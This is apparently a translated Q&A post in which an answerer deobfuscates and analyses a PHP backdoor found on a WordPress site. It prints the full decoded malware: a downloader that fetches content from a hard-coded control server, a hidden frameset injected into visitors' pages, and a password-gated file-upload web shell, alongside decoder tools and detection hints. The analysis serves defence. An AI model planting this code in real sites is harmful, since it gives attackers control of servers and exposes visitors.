WordPress上的病毒。你能告诉我如何解压缩这段“压缩”过的代码并理解这个病毒吗?

时间:2015-10-02 23:36:26

标签: wordpress exploit virus repair

我在wordpress安装上发现了一个似乎是恶意软件重新分发错误的病毒。我提取了它的代码,但它是以某种方式压缩的。我试图解压缩但它失败了。

代码分布在许多目录中,文件名为uge.php、ghe.php等。

在这里您可以找到代码:http://pasted.co/dc05c112

你能帮我删除这个病毒,查找所有被黑客攻击的文件并修复wordpress安装吗?

1 个答案:

答案 0 :(得分:4)

啊,这会很有趣。

转储代码

代码先对自身进行 base64 解码,再进行 gzip 解压缩,然后通过PHP的 create_function($vars, $function_code) 函数创建一个匿名函数。只需 echo 解码后的代码而不是 eval() 它,就能看到结果。我使用了这个转储脚本:

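<?php
// Decoder: undo the malware's base64 + gzcompress layer and print the result.
// Only ever echo the decoded text, never eval() it, and run this in an isolated
// analysis environment rather than on the compromised host.
$v = 'eNqm...'; //the string in the source above
echo gzuncompress(base64_decode($v));
?>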

在隔离的分析环境中执行这个PHP脚本,并把输出重定向到文件(解码结果本身就是可执行的PHP,不要把它放到任何网站根目录下)。

$ php -f decoder.php > uncompressed.php

结果中包含一些不可读的非ASCII字符,因此看起来可能有点乱。这些不可读的字符实际上是变量名的一部分。我把它们打印成十六进制来解码,这样源代码就变得可读了。同时还要解码形如\xff的十六进制转义字符和形如\32的八进制转义字符。完成之后,你会看到代码开头是这样的:

<?php
class _bcbbed83f4

{
    private static $_febfcfd79af5b5d3;
    // Table accessor: builds the string table on first use, then base64-decodes
    // the entry for the given key. The mixed-case "bAse64_DeCoDE" is accepted by
    // PHP (function names are case-insensitive) and defeats a case-sensitive
    // signature search for base64_decode. The chat-log comments are filler.
    static
    function _bdd3c3f4ff80($_96dbfd8c9e80c1)
    {
        if (!self::$_febfcfd79af5b5d3):
            self::_ee9bfb8bc6eb9d(); /*Bloodninja: I lick your earlobe, and undo your watch.*/
        endif;
        return bAse64_DeCoDE(self::$_febfcfd79af5b5d3[$_96dbfd8c9e80c1]); /*Sarah19fca: mmmm, okay.*/
    }

    private static
    function _ee9bfb8bc6eb9d()
    {
        self::$_febfcfd79af5b5d3 = array(
            "_\xfb\xe7\xaa\xee\xc5\xb8\xb8\xa6" =>
            /*Bloodninja: I take yo pants off, grunting like a troll.*/
            "\115\x54\111\064L\x6aE3Ny4yN\104M=",

反混淆

代码首先声明一个数组(相当于C#中的 Dictionary,因为它把一个string映射到另一个string)。这个数组中声明了7,392个字符串。整段代码中被插入了无意义的注释以降低可读性(不过相当有趣,似乎摘自某段cybersex聊天记录)。你可以先剥离注释,再对右侧的Base64字符串进行解码,从而解出数组中的每个字符串。我编写了一个C#程序,它从源代码中扫描出这个字典,然后把对该数组的每次调用替换为对应的值;这样,所有字符串就都被反混淆了。

using System;
using System.Collections.Generic;
using System.Text;
using System.IO;
using System.Text.RegularExpressions;
using System.Security.Cryptography;
namespace PHPDeobfusc
{
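    public class Program
    {
        // Default paths from the original listing ("..." is the author's placeholder);
        // overridden by args[0] / args[1] when given.
        // NOTE: the output is a runnable PHP file (the deobfuscated shell); write it
        // to a directory that no web server serves.
        private const string DefaultInputPath = @"C:\Users\...\decompressed.txt";
        private const string DefaultOutputPath = @"C:\Users\...\Desktop\hexified3.php";

        // "key" => "base64value" entries of the obfuscation string table.
        private static readonly Regex s_tableEntry =
            new Regex(@"""([^""]*)""\s*=>\s*""([^""]*)""");

        // Calls into the table accessor, _bcbbed83f4::_bdd3c3f4ff80("key").
        private static readonly Regex s_tableCall =
            new Regex(@"_bcbbed83f4::_bdd3c3f4ff80\(""([^""]*)""\)");

        // PHP string escapes. Octal is one to three [0-7] digits, as PHP reads it;
        // the original \d{3} missed two-digit forms such as \32 and threw a
        // FormatException on non-octal digits.
        private static readonly Regex s_octalEscape = new Regex(@"\\([0-7]{1,3})");
        private static readonly Regex s_hexEscape = new Regex(@"\\x([a-fA-F0-9]{2})");

        // /* ... */ filler comments the obfuscator sprinkles between tokens.
        private static readonly Regex s_blockComment =
            new Regex(@"/\*.*?\*/", RegexOptions.Singleline);

        /// <summary>
        /// Entry point. Pipeline: raw bytes -> printable text (non-ASCII bytes as hex)
        /// -> PHP escapes decoded -> comments stripped -> every string-table call
        /// replaced by its decoded literal -> written out.
        /// </summary>
        /// <param name="args">Optional: args[0] input file, args[1] output file.</param>
        static void Main(string[] args)
        {
            string inputPath = args.Length > 0 ? args[0] : DefaultInputPath;
            string outputPath = args.Length > 1 ? args[1] : DefaultOutputPath;

            byte[] content = File.ReadAllBytes(inputPath);
            string decod = HexifyNonPrintable(content);
            decod = PHPStringDecode(decod);
            decod = StripComments(decod);
            decod = ResolveArrayObfuscation(decod);
            File.WriteAllText(outputPath, decod);
        }

        /// <summary>
        /// Turns the raw source into readable text: printable ASCII is kept, any other
        /// byte becomes its two-digit hex code. Inside a double-quoted string the byte
        /// is written as a PHP escape (\xNN) so PHPStringDecode sees it; outside a
        /// string it is written bare (NN) and becomes part of the identifier.
        /// </summary>
        /// <param name="content">Raw bytes of the decompressed PHP source.</param>
        /// <returns>The hexified text.</returns>
        /// <exception cref="ArgumentNullException">content is null.</exception>
        public static string HexifyNonPrintable(byte[] content)
        {
            if (content == null)
                throw new ArgumentNullException(nameof(content));

            var output = new StringBuilder(content.Length);
            bool insideString = false;
            for (int i = 0; i < content.Length; i++)
            {
                byte c = content[i];
                // An unescaped quote toggles string state. The i == 0 guard was missing
                // in the original (content[i - 1] threw on a file starting with a quote).
                if (c == '"' && (i == 0 || content[i - 1] != '\\'))
                {
                    insideString = !insideString;
                }

                if (IsASCIIReadable(c))
                {
                    output.Append((char)c);
                }
                else if (insideString)
                {
                    output.Append("\\x").Append(c.ToString("x2"));
                }
                else
                {
                    output.Append(c.ToString("x2"));
                }
            }
            return output.ToString();
        }

        /// <summary>
        /// Scans the source for "key" => "base64" table entries.
        /// </summary>
        /// <param name="src">Hexified, escape-decoded PHP source.</param>
        /// <returns>Key to (still base64-encoded) value. A key that appears more than
        /// once keeps its last value, matching PHP array-literal semantics; the original
        /// Add() threw on a duplicate and aborted the whole run.</returns>
        public static Dictionary<string, string> CreateLookupDict(string src)
        {
            var dict = new Dictionary<string, string>(StringComparer.Ordinal);
            foreach (Match m in s_tableEntry.Matches(src))
            {
                dict[m.Groups[1].Value] = m.Groups[2].Value;
            }
            return dict;
        }

        /// <summary>
        /// Escapes a decoded value so it can be written back as a PHP double-quoted
        /// string literal: backslash, double quote and the dollar sign (PHP would
        /// otherwise interpolate "$name" inside the literal).
        /// </summary>
        public static string DotNetEncode(string input)
        {
            return input.Replace("\\", "\\\\").Replace("\"", "\\\"").Replace("$", "\\$");
        }

        /// <summary>
        /// Replaces every _bcbbed83f4::_bdd3c3f4ff80("key") call with the decoded
        /// literal for that key. Calls whose key is unknown, or whose table value is
        /// not valid base64, are left untouched instead of aborting the run.
        /// </summary>
        /// <param name="src">Hexified, escape-decoded, comment-stripped PHP source.</param>
        /// <returns>The source with all table calls inlined.</returns>
        public static string ResolveArrayObfuscation(string src)
        {
            var dict = CreateLookupDict(src);
            return s_tableCall.Replace(src, m =>
            {
                string base64;
                if (!dict.TryGetValue(m.Groups[1].Value, out base64))
                    return m.Value;

                byte[] raw;
                try
                {
                    raw = Convert.FromBase64String(base64);
                }
                catch (FormatException)
                {
                    return m.Value;
                }
                // Bytes that are not valid UTF-8 come out as U+FFFD; acceptable for a
                // read-only analysis dump.
                return "\"" + DotNetEncode(Encoding.UTF8.GetString(raw)) + "\"";
            });
        }

        /// <summary>
        /// Decodes PHP \NNN octal and \xNN hex escapes. Printable ASCII becomes the
        /// character itself; anything else becomes its bare two-digit hex code, which
        /// is what HexifyNonPrintable emits for identifiers, so table keys and the
        /// keys used in calls end up spelled the same way.
        /// </summary>
        /// <param name="input">Hexified PHP source.</param>
        /// <returns>The source with escapes resolved.</returns>
        public static string PHPStringDecode(string input)
        {
            // Octal first, then hex, in the original order.
            input = s_octalEscape.Replace(input, m => EscapeToText(Convert.ToInt32(m.Groups[1].Value, 8)));
            input = s_hexEscape.Replace(input, m => EscapeToText(Convert.ToInt32(m.Groups[1].Value, 16)));
            return input;
        }

        // Shared tail of both escape decoders (see PHPStringDecode).
        private static string EscapeToText(int codePoint)
        {
            return IsASCIIReadable((byte)codePoint)
                ? ((char)codePoint).ToString()
                : codePoint.ToString("x2");
        }

        /// <summary>
        /// Removes the /* ... */ comments the obfuscator inserts between tokens.
        /// Not shown in the original listing; this minimal version does not
        /// distinguish comment markers that occur inside string literals.
        /// </summary>
        public static string StripComments(string input)
        {
            return s_blockComment.Replace(input, "");
        }

        /// <summary>
        /// True for printable ASCII (0x20..0x7E) plus newline, carriage return and tab.
        /// </summary>
        public static bool IsASCIIReadable(byte c)
        {
            if (c == '\n' || c == '\r' || c == '\t')
                return true;
            return c > 31 && c < 127;
        }
    }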
}

这样你就得到了清理过的源代码。接下来用PHPStorm之类的PHP IDE开始重构代码,使其变得可读。下面是进一步反混淆后的代码版本:

<?php
class _bcbbed83f4

{
    // Obfuscation string table: key -> base64 of the real literal. Every literal
    // the script uses (IP ranges, URLs, HTML) is fetched through decode_string().
    private static $base64dict;

    // Builds the table on first use, then returns the base64-decoded entry for $key.
    static
    function decode_string($key)
    {
        if (!self::$base64dict):
            self::create_dictionary();
        endif;
        return base64_decode(self::$base64dict[$key]);
    }

    // 7,392 entries in the original; only the first and last are shown here.
    private static
    function create_dictionary()
    {
        self::$base64dict = array(
            "_fbe7aaeec5b8b8a6" => "MTI4LjE3Ny4yNDM=",
            "_e6cec0be84afbae6" => "MTI4LjE3Ny4yNDQuMTAw",
            //goes on..
            "_89bfa69ee79dc2dfedfd" => "cQ==",
        );
    }
}

error_reporting(0); //disable error reporting (also hides the warnings/notices this script would otherwise emit)
// IP table used below to classify the visitor: plain addresses, CIDR blocks
// and "start-end" ranges all appear. Its purpose (allow-list of operators?)
// is not stated in the code; see the analysis further down.
$decoded_dict = array(
     //originally, here were calls into the array, but they have already been resolved by the deobfuscator :)
     "128.177.243",
     "188.134.76.0"
     //...
        "173.194.0.0-173.194.255.255",
        "173.255.112.0/20",
        "192.158.28.0/22",
        "192.178.0.0/15",
        "193.142.125.0/24",
     //...
);

// Fetches $url with whichever transport the host allows, in fixed order:
// cURL, file(), fopen(), fsockopen() (called twice; presumably a copy/paste
// slip), then file_get_contents(). use_socket_create() below is never reached.
// Each helper returns false on failure; "" is returned when all of them fail.
function try_all_download_methods($url)
{
    $result = "";
    $result = @use_curl($url);
    if ($result !== false):
        return $result;
    endif;
    $result = @use_file($url);
    if ($result !== false):
        return $result;
    endif;
    $result = @use_fopen($url);
    if ($result !== false):
        return $result;
    endif;
    $result = @use_fsockopen($url);
    if ($result !== false):
        return $result;
    endif;
    $result = @use_fsockopen($url);
    if ($result !== false):
        return $result;
    endif;
    $result = @use_file_get_contents($url);
    if ($result !== false):
        return $result;
    endif;
    return "";
}

// cURL transport. The second parameter is never used (filler from the
// obfuscator). Options are looked up with constant("...") instead of being
// written literally; functionally identical. Plain HTTP, 5-second timeout,
// no TLS, no certificate handling.
function use_curl($url, $unused_parameter = 0.57911929962106)
{
    if (function_exists("curl_init") === false): //check if cURL is available
        return false;
    endif;
    $curl_state = curl_init(); //initiate it
    curl_setopt($curl_state, constant("CURLOPT_URL") , $url); //pass it the url
    curl_setopt($curl_state, constant("CURLOPT_RETURNTRANSFER") , true); //return the body instead of printing it
    curl_setopt($curl_state, constant("CURLOPT_TIMEOUT") , 5);
    curl_setopt($curl_state, constant("CURLOPT_HEADER") , NULL);
    $curl_result = curl_exec($curl_state);
    curl_close($curl_state);
    if ($curl_result == ""):
        return false;
    endif;
    return $curl_result; //return the downloaded string
}

// file_get_contents() transport (needs allow_url_fopen for http:// URLs).
// "@" suppresses the warning a failed fetch would emit.
function use_file_get_contents($file)
{
    if (function_exists("file_get_contents") === false): //check if can use that function
        return false;
    endif;
    $content = @file_get_contents($file);
    if ($content == ""):
        return false;
    endif;
    return $content;
}

// file() transport: reads the URL as an array of lines and joins them back.
function use_file($file)
{
    if (function_exists("file") === false):
        return false;
    endif;
    $line_array = @file($file);
    $joined_string = @join("", $line_array);
    if ($joined_string == ""):
        return false;
    endif;
    return $joined_string;
}

// fopen() transport: streams the URL in 10000-byte chunks. The second
// parameter is unused filler (an octal literal).
function use_fopen($file, $unused_par = 0165433)
{
    if (function_exists("fopen") === false):
        return false;
    endif;
    $file_content = "";
    $file_stream = @fopen($file, "r"); //open in read mode
    if ($file_stream):
        while (!feof($file_stream)):
            $file_content.= fread($file_stream, 10000);
        endwhile;
        fclose($file_stream);
    else:
        return false;
    endif;
    if ($file_content == ""):
        return false;
    endif;
    return $file_content;
}

// Raw-socket transport: hand-written HTTP/1.0 GET to port 80, 30-second
// connect timeout. Only "host", "path" and "query" of the URL are used.
function use_fsockopen($url)
{
    if (function_exists("fsockopen") === false):
        return false;
    endif;
    $url_array = @parse_url($url);
    $host = $url_array["host"];
    $path_and_query = $url_array["path"] . "?" . $url_array["query"];
    //$errno / $errstr are fsockopen's by-reference output parameters, so they
    //need not exist beforehand; they are simply never read afterwards.
    $socket = @fsockopen($host, 80, $errno_not_declared, $err_str_not_declared, 30);
    if (!$socket):
        return false;
    endif;
    $request = "GET " . $path_and_query . " HTTP/1.0\r\n";
    $request.= "Host: " . $host . "\r\n\r\n";
    fputs($socket, $request);
    $response = "";
    while (!feof($socket)):
        $response.= fread($socket, 10000);
    endwhile;
    fclose($socket);
    if ($response == ""):
        return false;
    endif;
    //Intended to split headers from body. As transcribed here the separator is
    //single-quoted, i.e. the literal characters backslash-r backslash-n, which
    //never matches a real CRLF CRLF; possibly an artifact of the deobfuscation.
    list($undeclared_list_variable, $response) = explode('\r' . '\n' . '\r' . '\n' , $response);
    return $response;
}

// socket_create() transport: same hand-written HTTP/1.0 GET as use_fsockopen,
// but connects to the resolved IP directly. Never called by
// try_all_download_methods() above.
function use_socket_create($url)
{
    if (function_exists("socket_create") === false):
        return false;
    endif;
    $url_array = @parse_url($url);
    $host = $url_array["host"];
    $path_and_query = $url_array["path"] . "?" . $url_array["query"];
    $host_ip = @gethostbyname($host);
    $double_converted_host_ip = @long2ip(@ip2long($host_ip));
    if ($host_ip != $double_converted_host_ip): //check the IP format validation by double-converting the ip from ip to long to ip again.
        return false;
    endif;
    $socket = @socket_create(AF_INET, SOCK_STREAM ,getprotobyname("tcp"));
    if (!@socket_connect($socket, $host_ip, 80)):
        @socket_close($socket);
        return false;
    endif;
    $request = "GET " . $path_and_query . " HTTP/1.0\r\n";
    //Unlike use_fsockopen, the request ends after the Host header without the
    //blank line that terminates HTTP headers; a server would keep waiting.
    $request.= "Host: " . $host . "\r\n";
    socket_write($socket, $request);
    $response = "";
    while ($received_chunk = socket_read($socket, 10000)):
        $response.= $received_chunk;
    endwhile;
    @socket_close($socket);
    if ($response == ""):
        return false;
    endif;
    //Same single-quoted separator as in use_fsockopen (see note there).
    list($unused_list_variable_2, $response) = explode('\r' . '\n' . '\r' . '\n' , $response);
    return $response;
}

// CIDR membership test. $source_string is "a.b.c.d/N"; both addresses are
// expanded to 32-bit binary strings and the first N bits are compared.
// No validation: non-numeric octets silently become zeroes.
function compare_ips($other_source_string, $source_string)
{
    $arr1 = explode("/", $source_string);
    $ip_array = explode(".", $arr1[0]);
    foreach($ip_array as & $binary_string):
        //converts the number from decimal to a binary string and pads it to 8 characters length by left-padding zeroes
        $binary_string = str_pad(decbin($binary_string) , 8 , "0", STR_PAD_LEFT);
    endforeach;
    $ip_array = substr(join("", $ip_array) , 0, $arr1[1]); //keep the network prefix ($arr1[1] = prefix length)
    $arr2 = explode(".", $other_source_string);
    foreach($arr2 as & $binary_string):
        $binary_string = str_pad(decbin($binary_string) , 8 , "0", STR_PAD_LEFT);
    endforeach;
    $arr2 = substr(join("", $arr2) , 0, $arr1[1]);
    return $arr2 == $ip_array;
}

$_a9a4fbb7d3d5f4eaf9 = ""; //two unused variables..
$_cfbbfe919aa1 = "";
//REMOTE_ADDR is set by the web server; HTTP_X_REAL_IP is a request header,
//so its value is whatever the client (or a reverse proxy in front) sends.
$client_ip = $_SERVER["REMOTE_ADDR"];
$client_maybe_proxy = $_SERVER["HTTP_X_REAL_IP"];

//IPv6 visitors (a ":" in either address) get nothing. Note strpos() returns
//0 (falsy) when the first character is ":", so e.g. "::1" slips through.
if (strpos($client_ip, ":") || strpos($client_maybe_proxy, ":")):
    exit;
endif;
//Reverse-DNS both addresses; the host name decides which branch runs.
$hostname_client = gethostbyaddr($client_ip);
$hostname_proxy = gethostbyaddr($client_maybe_proxy);
//is this a google bot? (empty branch: Google crawlers see the page untouched)
if (preg_match("/google/i", $hostname_client) || preg_match("/google/i", $hostname_proxy)):
else: //does it come from some site we don't like?
    //other search-engine / mail-provider crawlers are left alone as well
    if (preg_match("/yandex/i", $hostname_client) || preg_match("/yandex/i", $hostname_proxy) || preg_match("/yndx/i", $hostname_client) || preg_match("/yndx/i", $hostname_proxy) || preg_match("/mail.ru/i", $hostname_client) || preg_match("/mail.ru/i", $hostname_proxy) || preg_match("/rambler/i", $hostname_client) || preg_match("/rambler/i", $hostname_proxy) || preg_match("/msn/i", $hostname_client) || preg_match("/msn/i", $hostname_proxy) || preg_match("/microsoft/i", $hostname_client) || preg_match("/microsoft/i", $hostname_proxy) || preg_match("/bing/i", $hostname_client) || preg_match("/bing/i", $hostname_proxy)):
    else:
        //real code starts here: look the visitor up in the IP table
        $_decoded_dict = $decoded_dict; //make a reference to the base64-decoded dictionary
        $success = false;
        foreach($_decoded_dict as $decoded_str): //go through every member in that dict
            $decoded_str = trim($decoded_str);
            if (strpos($decoded_str, "/")): //is this an ip in CIDR notation? (e.g. 192.168.0.0/24)
                if (compare_ips($client_ip, $decoded_str) || compare_ips($client_maybe_proxy, $decoded_str)):
                    $success = true; //this url / ip WAS found in the dictionary. break.
                    break;
                endif;
            else:
                if ($decoded_str[strlen($decoded_str) - 1 ] === "0"): //is the last character a '0'? (entry like 188.134.76.0 means the whole /24)
                    $start_of_subnet = substr($decoded_str, 0, strlen($decoded_str) - 1) . "1"; //take everything but the last character and append a '1'.
                    $end_of_subnet = substr($decoded_str, 0 , strlen($decoded_str) - 1) . "254"; //replace the end with '254'
                    if (ip2long($start_of_subnet) && ip2long($end_of_subnet)):
                        $client_ip_as_long = ip2long($client_ip); //convert the ip addresses to numbers
                        $client_proxy_as_long = ip2long($client_maybe_proxy);
                        if ($client_ip_as_long >= ip2long($start_of_subnet) && $client_ip_as_long <= ip2long($end_of_subnet)):
                            $success = true; //the IP address of the client ip IS within this subnet
                            break;
                        else:
                            if ($client_proxy_as_long >= ip2long($start_of_subnet) && $client_proxy_as_long <= ip2long($end_of_subnet)):
                                $success = true; //success also here if the client PROXY IP is within this subnet.
                                break;
                            endif;
                        endif;
                    endif;
                else:
                    if (strpos($decoded_str, "-")): //is there a '-' in the string? This is for the strings of the kind 192.168.0.1-192.168.0.255
                        $exploded_arr = explode("-", $decoded_str); //explode it
                        $client_ip_as_long = ip2long($client_ip); //same stuff as above
                        $client_proxy_as_long = ip2long($client_maybe_proxy);
                        if ($client_ip_as_long >= ip2long(trim($exploded_arr[0])) && $client_ip_as_long <= ip2long(trim($exploded_arr[1]))):
                            $success = true;
                            break;
                        else:
                            if ($client_proxy_as_long >= ip2long($exploded_arr[0]) && $client_proxy_as_long <= ip2long($exploded_arr[1])):
                                $success = true;
                                break;
                            endif;
                        endif;
                    else:
                        if (ip2long($decoded_str) > -1): //plain single address: exact string match only
                            if ($decoded_str === $client_ip || $decoded_str === $client_maybe_proxy):
                                $success = true;
                                break;
                            endif;
                        endif;
                    endif;
                endif;
            endif;
        endforeach;
        //Conditional function declaration: only defined when this branch runs.
        //Builds http://<C2 IP>/www.<this host>/<query string> and fetches it;
        //whatever the C2 returns is echoed to the visitor further down.
        function download_stuff_from_server()
        {
            $magic_ip = "87.118.108.89"; //hard-coded command-and-control address
            $query_string = $_SERVER["QUERY_STRING"];
            $server_name = $_SERVER["SERVER_NAME"];
            $www_dot = "www.";
            $starts_with_www = stripos($server_name, $www_dot);
            if ($starts_with_www === false):
                $server_name = "www." . $server_name;
            endif;
            $url = "http://" . $magic_ip . "/" . $server_name . "/" . $query_string;
            return try_all_download_methods($url);
        }

        //Operator gate: the "b" query parameter is md5-compared against a fixed
        //hash. Detection: search the web root for this hash constant, the "_upl"
        //form field, or the C2 address above.
        if (md5(@$_GET["b"]) === "3edb21a5f513ee1a610c8ad1835d4512"): //compare the b GET parameter with the magic value to get access to this form!
            $success = true;
            echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">";
            echo "<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Go\"></form>";
            if ($_POST["_upl"] == "Go"):
                //Arbitrary file write into the script's own directory: the client-supplied
                //file name is used unchanged, so any name/extension can be dropped here.
                if (@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])): //Copy the given file to the server
                    echo "<b>Go</b><br /><br />";
                else:
                    echo "<b>Up</b><br /><br />";
                endif;
            endif;
        endif;
        if (!$success): //the user that has accessed this shell is new / not one of the allowed users.
            //Inject a JavaScript so that we can trace him. This is basically a document.write(<invisible frameset>)
            //pointing at box.mimia.berlin; the visitor's browser makes that request silently.
            $javascript_src = "<script> var _0x5254 = [\"<frameset rows=\\\"*,0\\\" framespacing=\\\"0\\\" border=\\\"0\\\" frameborder=\\\"NO\\\"><frame src=\\\"http://box.mimia.berlin/apply/\\\" noresize=\\\"\\\" scrolling=\\\"auto\\\"></frameset>\", \"write\"]; document[_0x5254[1]](_0x5254[0]);</ script > ";
            $magic_file = download_stuff_from_server();
            $to_echo = $javascript_src . $magic_file;
            echo $to_echo;
        else:
            //Listed visitors (or anyone who passed the "b" gate) get the C2 content only.
            $magic_file = download_stuff_from_server();
            echo $magic_file;
        endif;
    endif;
endif;

if (isset($_GET["q"])): //Option to output the md5 of this file (after uploading); presumably lets an operator check which version is installed.
    echo md5(file_get_contents(__FILE__));
endif;;

代码分析

这段代码的14,000多行中,绝大部分只是一个包含IP地址和IP范围的字符串数组,我们稍后再看。开头处有6个函数,它们都试图用不同的方式下载文件:第一个选项是cURL,然后依次是PHP函数file()、fopen()、fsockopen()、socket_create()和file_get_contents()。既然他们尝试了6种不同的下载方法,能从其他服务器下载文件对他们来说显然非常重要。

更有趣的是,下载的究竟是什么内容,以及这些IP地址有什么用途。代码以下面两行开头:
$client_ip = $_SERVER["REMOTE_ADDR"]; //set by the web server
$client_maybe_proxy = $_SERVER["HTTP_X_REAL_IP"]; //a request header, i.e. client-supplied

然后反查这些IP地址的DNS主机名,并用正则表达式排除特定的域名:

if (preg_match("/google/i", $hostname_client) || preg_match("/google/i", $hostname_proxy)):
else: //does it come from some site we don't like?
    if (preg_match("/yandex/i", $hostname_client) || preg_match("/yandex/i", $hostname_proxy) || preg_match("/yndx/i", $hostname_client) || preg_match("/yndx/i", $hostname_proxy) || preg_match("/mail.ru/i", $hostname_client) || preg_match("/mail.ru/i", $hostname_proxy) || preg_match("/rambler/i", $hostname_client) || preg_match("/rambler/i", $hostname_proxy) || preg_match("/msn/i", $hostname_client) || preg_match("/msn/i", $hostname_proxy) || preg_match("/microsoft/i", $hostname_client) || preg_match("/microsoft/i", $hostname_proxy) || preg_match("/bing/i", $hostname_client) || preg_match("/bing/i", $hostname_proxy)):
    else: //real code starts here

如果你通过了这些检查,代码会尝试在开头那个数组的IP地址列表中查找你的IP地址。数组中存储了3种形式的IP地址:普通IP地址(如66.249.66.216)、CIDR子网表示法(如8.8.4.0/24),以及区间形式(如66.249.60.0-66.249.95.255)。如果你来自其中某个IP地址,布尔变量success就会被设为true。让我们看看它如何根据检查结果作出反应:

//Visitors not in the IP table get an invisible frameset (box.mimia.berlin)
//in front of the C2 content; listed visitors get the C2 content alone.
if (!$success): //the user that has accessed this shell is new / not one of the allowed users.
    //Inject a JavaScript so that we can trace him. This is basically a document.write(<invisible frameset>)
    $javascript_src = "<script> var _0x5254 = [\"<frameset rows=\\\"*,0\\\" framespacing=\\\"0\\\" border=\\\"0\\\" frameborder=\\\"NO\\\"><frame src=\\\"http://box.mimia.berlin/apply/\\\" noresize=\\\"\\\" scrolling=\\\"auto\\\"></frameset>\", \"write\"]; document[_0x5254[1]](_0x5254[0]);</ script > ";
    $magic_file = download_stuff_from_server();
    $to_echo = $javascript_src . $magic_file;
    echo $to_echo;
else:
    $magic_file = download_stuff_from_server();
    echo $magic_file;
endif;

有趣。如果你不在这个IP地址列表中,服务器会向你注入一段JavaScript,它写入一个没有边框、也没有宽度/高度的<iframe>(准确地说是frameset),从而不可见。你在这里被迫访问的网址是http://box.mimia.berlin/apply/。根据域名历史记录,域名mimia.berlin于2014年9月1日注册。那么download_stuff_from_server()是做什么的呢?

//Builds http://<C2 IP>/www.<this host>/<query string> and fetches it. The
//result is echoed straight to the visitor, so the C2 decides what is served
//and learns the hacked host name with every request.
function download_stuff_from_server()
{
    $magic_ip = "87.118.108.89"; //hard-coded command-and-control address
    $query_string = $_SERVER["QUERY_STRING"];
    $server_name = $_SERVER["SERVER_NAME"];
    $www_dot = "www.";
    $starts_with_www = stripos($server_name, $www_dot);
    if ($starts_with_www === false):
        $server_name = "www." . $server_name;
    endif;
    $url = "http://" . $magic_ip . "/" . $server_name . "/" . $query_string;
    return try_all_download_methods($url);
}

在这里我们可以看到一个硬编码的IP地址。被入侵的本地服务器名称被用来拼出形如http://87.118.108.89/www.hacked_domain.com/的URL。无论该服务器本应返回什么,它现在已经离线了。这个IP地址显然充当了控制服务器,因为它返回的内容会直接显示给shell用户/网站访问者。所以到目前为止,我们看到的是某种IP地址记录:通过注入JavaScript强制浏览器向某个域名发起请求,并记录被入侵服务器的地址。但shell的功能在哪里呢?接近结尾处,你会看到:

//Operator gate: md5 of the "b" query parameter is compared to a fixed hash.
//Detection: search the web root for this hash constant or the "_upl" form field.
if (md5(@$_GET["b"]) === "3edb21a5f513ee1a610c8ad1835d4512"): //compare the b GET parameter with the magic value to get access to this form!
    $success = true;
    echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">";
    echo "<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Go\"></form>";
    if ($_POST["_upl"] == "Go"):
        //Arbitrary file write: the client-supplied file name is used unchanged, in the script's own directory.
        if (@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])): //Copy the given file to the server
            echo "<b>Go</b><br /><br />";
        else:
            echo "<b>Up</b><br /><br />";
        endif;
    endif;
endif;

这里echo出了一个经典的上传表单(你可以看到其中的HTML代码),配合copy()函数实现文件上传。但只有当我们在URL查询中为b参数提供md5哈希正确的魔术值时,才会显示这个表单。非常有意思。

此外似乎还有一些调试代码:如果我们在URL中提供q参数,它会echo出当前脚本文件的md5()值。

if (isset($_GET["q"])): //Option to output the md5 of this file; presumably lets an operator check which version is installed.
    echo md5(file_get_contents(__FILE__));
endif;;

结论

我们这里看到了什么?唯一真正的功能是在被入侵的服务器上得到一个上传表单——一个经典的文件上传,封装在10行代码里。其余代码都围绕着一个包含IP地址和范围的巨大数组,用来决定是否显示上传表单。也许这是一份允许使用该shell的黑客名单?或者它会记录些什么?事实是,这个数组在执行期间(至少在这个脚本中)不会被修改。事实是,这个超过约7,400个IP地址的列表非常庞大。事实是,该网页的访问者/浏览者会通过访问http://box.mimia.berlin/apply/被记录下来,该站点可能是专门为这些黑客活动租用的服务器,位于德国。鉴于该域名的注册已于2015年6月20日到期、站点已不再可用,黑客现在可能已经不活跃了。分析还揭示了某种命令与控制服务器,shell用户看到的内容正是从它那里获取的。顺便说一句,用谷歌搜索魔术md5值3edb21a5f513ee1a610c8ad1835d4512会找到一个网站;这可能是一种标记受感染页面的方法。

更新

在通过谷歌搜索上面那个字符串找到的页面上,源代码似乎是明文的。它的字符串混淆方式不同,是通过异或完成的。最有趣的是,变量名是明文的,函数名是真实的,而且其中引用了另一个网站。

//This is my own decoder code for decoding one part
 <?php

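class _afe2f7befb999fa1
{
    // String table: key -> base64 of the XOR-encrypted text.
    private static $dict;

    // Returns the plaintext for $key: base64-decodes the table entry, then XORs
    // every byte with the repeating key. $xorKey is an array of byte values (see
    // the call below); its length is taken from the array instead of being
    // hard-coded to 8, so other key lengths work unchanged.
    static
    function decrypt($key, $xorKey)
    {
        if (!self::$dict):
            self::createDict();
        endif;
        $xorKeyLen = count($xorKey);
        $decoded_str = base64_decode(self::$dict[$key]);
        for ($i = 0 , $len_dec = strlen($decoded_str); $i !== $len_dec; ++$i):
            $decoded_str[$i] = chr(ord($decoded_str[$i]) ^ $xorKey[$i % $xorKeyLen]);
        endfor;
        return $decoded_str;
    }

    // One table entry kept for the demonstration; the original holds many.
    private static
    function createDict()
    {
        self::$dict = array(
            "_a1def5c3cfd4e2e896" => "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" . "rPKgVe" . "U=",
        );
    }
}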


//Decode one entry with the 8-byte XOR key; the key is the bytes of "_98dd81fc85c9ad" read as '_' followed by seven hex pairs.
echo _afe2f7befb999fa1::decrypt("_a1def5c3cfd4e2e896", array(ord('_'), 0x98, 0xdd, 0x81, 0xfc, 0x85, 0xc9, 0xad)  /*"_98dd81fc85c9ad"*/);
?>

//real code starts here 
<?php
error_reporting(0); //hide warnings/notices that would expose the script
//IP table, in clear text in this variant (the XOR layer replaces the base64 table).
$ips = array(
    "128.177.243",
    "128.177.244.100",
    "128.177.244.86",
    "194.112.94.250",
    "194.112.94.251",
    //...
    "188.134.76.0"
);

//Same fetch cascade as try_all_download_methods() in the first variant, with
//the helpers renamed; tryfsockopen_999 is again called twice in a row.
